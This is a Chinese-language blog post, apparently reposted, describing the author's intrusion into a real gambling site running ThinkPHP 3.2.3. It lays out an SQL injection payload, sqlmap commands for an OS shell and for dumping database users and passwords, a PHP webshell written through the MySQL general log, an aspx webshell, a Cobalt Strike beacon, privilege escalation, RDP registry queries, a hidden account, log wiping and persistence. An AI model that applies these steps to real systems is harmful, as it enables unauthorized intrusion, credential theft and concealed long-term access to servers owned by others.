微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

实战|对某棋牌站的一次getshell

起因

最近在fofa翻目标C段的时候,碰巧看到了这个站便记了下来,等下班回家后直接拿下。

图片

目标环境信息

BC类的活动页很多都是thinkPHP二改的站,我们主要确定当前tp的版本号。

http://www.abc.com/index.PHP?s=1

图片

目标环境信息

  • Windows
  • ThinkPHP v.3.2.3
  • 开启Debug模式
  • 网站绝对路径 D:\web1\abc.com\wwlsoeprsueords\

用工具扫描日志文件

图片

tp3注入漏洞不存在,日志文件在/addons/Runtime/Logs/admin/路径下,但并没有扫到任何的日志文件,猜测日志文件可能为另外一个命名格式

eg. 1606510976-20_11_28.log

时间戳-年_月_日.log

站点没有CDN,在fofa上搜IP发现999端口为PHPmyadmin页面

图片

寻找注入

一般来说,这类的活动推广页申请进度查询是存在注入的,用burp抓包

图片

payload如下:

username=123' and (extractvalue(1,concat(0x7e,(select user()),0x7e))))--+&id=13

果不其然,存在注入,还是root权限,直接就上sqlmap跑

python3 sqlmap.py -r 1.txt --random-agent --dbms=MysqL --os-shell

图片

还跑了几种其他类型的注入,但我们直接--os-shell报错,尝试了几次都一样返回No output,猜测可能有某种防护产品。

getshell

前面我们有找到PHPmyadmin页面,我们枚举数据库账户和密码

python3 sqlmap.py –r 1.txt --string="Surname" --users --password

图片

并且已经帮我们解码明文了,root账号登录后报错#1045 无法登录服务器,换成dog1账号登录成功

PHPmyadmin写shell:

SHOW GLOBAL VARIABLES LIKE "%secure%";

当secure_file_priv的值为null,表示限制MysqL不允许导入|导出

当secure_file_priv的值没有具体值时,表示不对MysqL的导入|导出做限制

图片

用命令打开日志保存状态,设置日志保存路径

set global general_log = "ON";

set global general_log_file='D:/web1/abc.com/robots.PHP';

SQL查询语句处执行我们的PHP一句话,然后用蚁剑去连日志文件robots.PHP即可getshell

图片

绕过限制上线cs

查看PHPinfo(),发现ban了成吨的函数,无法执行命令。

图片

我们可以上传aspx马进行绕过,这里我使用的是冰蝎3的aspx马

图片

现在可以执行命令了,但还是无法查看相关文件夹等其他问题。

图片

查看系统有无杀软,准备上线

tasklist /svc

图片

没有任何杀软,用cs生成exe上传到根目录,然后启动执行上线

图片

用烂土豆可以直接提到system权限

图片

直接通过注册表查是否开启3389,端口号是多少

REG QUERY "HKEY_LOCAL_MACHINE\SYstem\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启

REG QUERY "HKEY_LOCAL_MACHINE\SYstem\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服务的端口

图片

一个隐藏用户直接远程登录过去,清除日志,做自启动,拿下该站点

图片

 

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐